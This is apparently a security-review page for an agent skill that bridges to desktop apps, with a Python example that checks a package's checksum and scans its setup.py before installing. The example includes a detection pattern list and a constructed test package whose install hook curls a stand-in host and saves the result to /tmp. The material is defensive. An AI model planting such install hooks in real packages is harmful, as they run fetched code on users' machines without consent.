Skill v1.0.2
ClawScan security
Flue — Desktop Software Bridge · ClawHub's context-aware review of the artifact, metadata, and declared behavior.
Scanner verdict
Benign · Apr 29, 2026, 12:43 PM
- Verdict: benign
- Confidence: high
- Model: gpt-5-mini
- Summary: The skill's requirements and runtime instructions are coherent with a desktop-automation bridge: it asks the agent to use a Python package (Flue) and to run its CLI, and it does not request unrelated credentials or access.
- Guidance: This skill appears internally consistent, but it relies on installing the external 'flue' Python package. Before installing, verify the package and its source: review the linked GitHub repo and the PyPI page, confirm the release/version, and inspect the setup and entry-point code for anything that executes at install time. Only run 'pip install flue' with explicit human approval, and prefer an isolated virtualenv or sandbox. Be aware that once installed, the flue CLI can script and control local desktop apps (via COM, AppleScript, or in-app bridges) and can therefore read and modify documents; explicitly confirm any destructive or export action with the human. If you need stronger assurance, ask the human to provide a checksum for the PyPI artifact or to review the package code (especially flue.setup, flue.cli, and the adapter files) before allowing the agent to install or execute it.
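The guidance above amounts to a pre-install gate: fetch the artifact, check it against a digest the human supplied, read the setup and entry-point code before anything executes, and then install only the exact bytes that were reviewed. The script below is an added example, not ClawHub's scanner and not any Flue project code. It builds two constructed stand-in sdists for a hypothetical package `examplepkg` (one clean, one with an install-time hook) instead of downloading anything, and it assumes a real artifact would first be obtained with `pip download <pkg>==<ver> --no-deps --no-binary :all: -d dist/`. The indicator list and the `gate_install` decision are the example's own, not a ClawHub check.

```python
import hashlib
import hmac
import io
import re
import tarfile
from typing import Dict, List

# Example's own indicator list: install-time code execution or network reach in setup.py.
RISKY_SETUP_PATTERNS = {
    "custom-install-command": r"cmdclass\s*=",
    "subprocess": r"\bsubprocess\.",
    "shell-exec": r"\bos\.(system|popen)\s*\(",
    "dynamic-exec": r"\b(exec|eval)\s*\(",
    "network": r"\b(urllib|requests|socket|http\.client)\b",
    "encoding-tricks": r"\bbase64\b",
}
# "name = module:function" as written in pyproject [project.scripts] or setup.py
# console_scripts; the required colon rules out name=/version=/url= lines.
ENTRY_POINT_RE = re.compile(r'(\w[\w-]*)\s*=\s*["\']?([\w.]+:[\w.]+)')


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_checksum(data: bytes, expected_sha256: str) -> bool:
    """Constant-time compare of the artifact digest with the human-provided value."""
    return hmac.compare_digest(sha256_hex(data), expected_sha256.strip().lower())


def hash_pinned_requirement(name: str, version: str, data: bytes) -> str:
    """Requirement line for `pip install --require-hashes`; pip rejects any other bytes."""
    return f"{name}=={version} --hash=sha256:{sha256_hex(data)}"


def scan_sdist(data: bytes) -> Dict[str, object]:
    """Flag install-time hooks in setup.py and list the CLI entry points the package declares."""
    findings: List[str] = []
    entry_points: Dict[str, str] = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            rel = member.name.split("/", 1)[-1]  # strip the "pkg-version/" prefix
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            if rel == "setup.py":
                findings += [label for label, pat in RISKY_SETUP_PATTERNS.items() if re.search(pat, text)]
            if rel in ("setup.py", "setup.cfg", "pyproject.toml"):
                entry_points.update(ENTRY_POINT_RE.findall(text))
    return {"findings": findings, "entry_points": entry_points}


def gate_install(name: str, version: str, data: bytes, expected_sha256: str) -> str:
    """Decision to hand back to the human: install only a hash-matched, hook-free artifact."""
    if not verify_checksum(data, expected_sha256):
        return "reject: checksum mismatch"
    findings = scan_sdist(data)["findings"]
    if findings:
        return "hold: install-time code needs human review: " + ", ".join(findings)
    return "ok: " + hash_pinned_requirement(name, version, data)


def build_sdist(name: str, version: str, files: Dict[str, str]) -> bytes:
    """Constructed sdist for the demo; a real one comes from `pip download`."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for rel, content in files.items():
            raw = content.encode()
            info = tarfile.TarInfo(f"{name}-{version}/{rel}")
            info.size = len(raw)
            tar.addfile(info, io.BytesIO(raw))
    return buf.getvalue()


# Constructed stand-in: declarative build, one console script, nothing runs at install.
CLEAN_SDIST = build_sdist("examplepkg", "1.0.2", {
    "pyproject.toml": '[project]\nname = "examplepkg"\nversion = "1.0.2"\n\n'
                      '[project.scripts]\nexamplepkg = "examplepkg.cli:main"\n',
    "examplepkg/cli.py": "def main():\n    print('hello')\n",
})

# Constructed stand-in: same package with a custom install command that shells out.
HOOKED_SDIST = build_sdist("examplepkg", "1.0.2", {
    "setup.py": (
        "import subprocess\n"
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "class PostInstall(install):\n"
        "    def run(self):\n"
        "        subprocess.run(['curl', '-s', 'http://example.invalid/x', '-o', '/tmp/x'])\n"
        "        install.run(self)\n"
        "setup(name='examplepkg', version='1.0.2', cmdclass={'install': PostInstall},\n"
        "      entry_points={'console_scripts': ['examplepkg = examplepkg.cli:main']})\n"
    ),
})

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_SDIST), ("hooked", HOOKED_SDIST)):
        # In practice the digest comes from the human, not from the artifact itself.
        print(label, "->", gate_install("examplepkg", "1.0.2", blob, sha256_hex(blob)))
        print("   entry points:", scan_sdist(blob)["entry_points"])
```

The `--hash=` line the gate emits is consumed by `pip install --require-hashes -r requirements.txt`, which makes pip refuse any artifact whose digest differs from the one that was reviewed; install with the same `--no-binary :all:` flag so pip builds from the scanned sdist rather than pulling a wheel that was never inspected. A clean setup.py only covers install time: the CLI still gets the COM/AppleScript reach the review describes once it runs, so `flue setup` belongs in the same sandboxed virtualenv, with the human confirming each action that touches documents.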
Review Dimensions
- Purpose & Capability: ok. The name/description (desktop software bridge) matches the instructions: invoking a local Python package (flue) to run scripts inside host apps' automation runtimes. No unrelated environment variables, binaries, or config paths are requested.
- Instruction Scope: note. The SKILL.md explicitly instructs the agent to run 'pip install flue && flue setup' (with human permission) and to use the flue CLI (py -m flue.cli / python3 -m flue.cli). These commands are within the bridge's stated purpose, but they perform a network install, and the installed package can then inspect and control local apps (COM/AppleScript/in-app bridges). The instructions otherwise avoid accessing unrelated files or secrets and emphasize asking the human before destructive actions.
- Install Mechanism: note. There is no automatic install spec in the registry; the SKILL.md asks the human to run 'pip install flue' (PyPI) and links to a GitHub repo and PyPI page. Installing a package from PyPI is expected for this functionality but carries the usual risk that arbitrary code is downloaded and executed during install or when the CLI runs. The SKILL.md does point to the project's GitHub and PyPI entries, so a user can inspect provenance before installing.
- Credentials: ok. The skill declares no required env vars, no credentials, and no config paths, which aligns with the described function. Note that runtime use of the installed package will interact with local desktop apps and their APIs (COM, AppleScript, in-app scripting); that is proportionate to a desktop-automation bridge but means the package gains the ability to read and modify local documents and app state.
- Persistence & Privilege: ok. The skill is not marked 'always' and has default invocation settings. It does not request to persist or modify other skills or system-wide agent settings. Autonomous invocation is allowed (the platform default), which on its own is not a red flag here.
